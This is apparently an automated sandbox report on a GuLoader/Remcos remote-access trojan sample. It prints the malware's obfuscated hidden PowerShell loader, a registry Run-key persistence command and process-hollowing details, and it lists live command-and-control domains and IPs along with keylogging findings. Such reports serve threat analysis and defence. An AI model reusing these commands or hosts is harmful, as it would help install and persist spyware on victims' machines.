              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dceyoihckfacn"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\owkrpbswynspxwny"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Unthematic" /t REG_EXPAND_SZ /d "%Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)"Jump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$respireredes=get-content 'c:\users\user\appdata\roaming\brosy\udrulnings\depravingly238\glathvls\rotorklipper\ergotoxine\oxaloacetic.arc';$brikvvningernes=$respireredes.substring(58067,3);.$brikvvningernes($respireredes)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "unthematic" /t reg_expand_sz /d "%scrippage% -windowstyle minimized $raquette=(get-itemproperty -path 'hkcu:\kvidret\').unemancipated;%scrippage% ($raquette)"
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$respireredes=get-content 'c:\users\user\appdata\roaming\brosy\udrulnings\depravingly238\glathvls\rotorklipper\ergotoxine\oxaloacetic.arc';$brikvvningernes=$respireredes.substring(58067,3);.$brikvvningernes($respireredes)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "unthematic" /t reg_expand_sz /d "%scrippage% -windowstyle minimized $raquette=(get-itemproperty -path 'hkcu:\kvidret\').unemancipated;%scrippage% ($raquette)"Jump to behavior
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerlesW
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerdiR
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet/
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managery
              Source: wab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\586 R1 M-LINE - GEORGIA 03.05.2024.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: Amcache.hve.18.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.18.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.18.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.18.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6544, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		3
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules              		1
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		1
              Obfuscated Files or Information              		LSASS Memory14
              System Information Discovery              		Remote Desktop Protocol11
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts21
              Command and Scripting Interpreter              		Logon Script (Windows)312
              Process Injection              		1
              Software Packing              		Security Account Manager121
              Security Software Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login Hook1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
              Virtualization/Sandbox Evasion              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435835 Sample: 586 R1  M-LINE - GEORGIA 03... Startdate: 03/05/2024 Architecture: WINDOWS Score: 100 58 learfo55ozj02.duckdns.org 2->58 60 geoplugin.net 2->60 62 enelltd.top 2->62 70 Snort IDS alert for network traffic 2->70 72 Found malware configuration 2->72 74 Antivirus detection for URL or domain 2->74 78 8 other signatures 2->78 10 586 R1  M-LINE - GEORGIA 03.05.2024.exe 37 2->10         started        signatures3 76 Uses dynamic DNS services 58->76 process4 file5 54 C:\Users\user\AppData\...\Oxaloacetic.Arc, ASCII 10->54 dropped 88 Suspicious powershell command line found 10->88 14 powershell.exe 20 10->14         started        signatures6 process7 file8 56 586 R1  M-LINE - GEORGIA 03.05.2024.exe, PE32 14->56 dropped 92 Obfuscated command line found 14->92 94 Writes to foreign memory regions 14->94 96 Found suspicious powershell code related to unpacking or dynamic code loading 14->96 98 Powershell drops PE file 14->98 18 wab.exe 5 15 14->18         started        23 cmd.exe 1 14->23         started        25 conhost.exe 14->25         started        signatures9 process10 dnsIp11 64 learfo55ozj02.duckdns.org 193.222.96.21, 29871, 49739, 49740 SWISSCOMSwisscomSwitzerlandLtdCH Germany 18->64 66 enelltd.top 172.67.215.46, 443, 49738 CLOUDFLARENETUS United States 18->66 68 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 18->68 52 C:\Users\user\AppData\Roaming\fvberms.dat, data 18->52 dropped 80 Uses cmd line tools excessively to alter registry or file data 18->80 82 Maps a DLL or memory area into another process 18->82 84 Sample uses process hollowing technique 18->84 86 Installs a global keyboard hook 18->86 27 cmd.exe 1 18->27         started        30 wab.exe 18->30         started        32 wab.exe 18->32         started        34 13 other processes 18->34 file12 signatures13 process14 signatures15 90 Uses cmd line tools excessively to alter registry or file data 27->90 36 conhost.exe 27->36         started        38 reg.exe 1 1 27->38         started        40 WerFault.exe 18 30->40         started        42 WerFault.exe 22 18 32->42         started        44 WerFault.exe 18 34->44         started        46 WerFault.exe 18 34->46         started        48 WerFault.exe 34->48         started        50 2 other processes 34->50 process16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              586 R1 M-LINE - GEORGIA 03.05.2024.exe14%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe11%ReversingLabs
              C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Fugendes151\586 R1 M-LINE - GEORGIA 03.05.2024.exe14%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              learfo55ozj02.duckdns.org1%VirustotalBrowse
              enelltd.top4%VirustotalBrowse
              geoplugin.net4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://geoplugin.net/json.gp100%URL Reputationphishing
              http://crl.micro0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://contoso.com/0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gpf0%Avira URL Cloudsafe
              http://geoplugin.net/0%Avira URL Cloudsafe
              https://enelltd.top/0%Avira URL Cloudsafe
              learfo55ozj02.duckdns.org0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpm0%Avira URL Cloudsafe
              http://geoplugin.net/4%VirustotalBrowse
              learfo55ozj02.duckdns.org1%VirustotalBrowse
              http://geoplugin.net/json.gpm0%VirustotalBrowse
              http://geoplugin.net/json.gpf0%VirustotalBrowse
              https://enelltd.top/0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              learfo55ozj02.duckdns.org
              		193.222.96.21
              		truetrueunknown
              enelltd.top
              		172.67.215.46
              		truefalseunknown
              geoplugin.net
              		178.237.33.50
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://geoplugin.net/json.gptrue
              • URL Reputation: phishing
              • URL Reputation: phishing
              		unknown
              learfo55ozj02.duckdns.orgtrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://enelltd.top/wab.exe, 00000007.00000002.2877594254.0000000005548000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://geoplugin.net/json.gpfwab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://crl.micropowershell.exe, 00000001.00000002.2193750847.0000000000B2A000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/powershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpmwab.exe, 00000007.00000002.2877594254.0000000005567000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216916264.0000000005579000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.2216886592.0000000005575000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Iconpowershell.exe, 00000001.00000002.2196989901.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://upx.sf.netAmcache.hve.18.drfalse
                      		high
                      https://aka.ms/pscore6lBkqpowershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorError586 R1 M-LINE - GEORGIA 03.05.2024.exe, 586 R1 M-LINE - GEORGIA 03.05.2024.exe.1.drfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2194433332.0000000004A91000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2194433332.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              178.237.33.50
                              		geoplugin.netNetherlands
                              		8455ATOM86-ASATOM86NLfalse
                              172.67.215.46
                              		enelltd.topUnited States
                              		13335CLOUDFLARENETUSfalse
                              193.222.96.21
                              		learfo55ozj02.duckdns.orgGermany
                              		3303SWISSCOMSwisscomSwitzerlandLtdCHtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1435835
                              Start date and time:2024-05-03 09:42:09 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 47s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:46
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:586 R1 M-LINE - GEORGIA 03.05.2024.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@71/43@3/3
                              EGA Information:
                              • Successful, ratio: 33.3%
                              HCA Information:
                              • Successful, ratio: 91%
                              • Number of executed functions: 91
                              • Number of non-executed functions: 39
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.42.73.29, 104.208.16.94, 20.42.65.92, 52.168.117.173
                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                              • Execution Graph export aborted for target powershell.exe, PID 1612 because it is empty
                              • Execution Graph export aborted for target wab.exe, PID 6544 because there are no executed function
                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              08:43:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Unthematic %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)
                              08:44:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Unthematic %Scrippage% -windowstyle minimized $Raquette=(Get-ItemProperty -Path 'HKCU:\kvidret\').Unemancipated;%Scrippage% ($Raquette)
                              09:42:59API Interceptor29x Sleep call for process: powershell.exe modified
                              09:44:13API Interceptor7x Sleep call for process: WerFault.exe modified
                              09:44:31API Interceptor79x Sleep call for process: wab.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              178.237.33.50xi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              GVV.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                              • geoplugin.net/json.gp
                              PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                              • geoplugin.net/json.gp
                              172.67.215.46NewCPhong.exeGet hashmaliciousUnknownBrowse
                                193.222.96.21PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                  Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                    .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                      z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            sample.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              Copy of Noyan Order Form Global Importing Group 2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                Commande No 00007 de M.N.S. S.A. 24000127 MNS Distribution.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                  107. PN-EN-1090-2+A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    learfo55ozj02.duckdns.orgPO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    enelltd.topPO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 104.21.45.139
                                                    geoplugin.netxi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
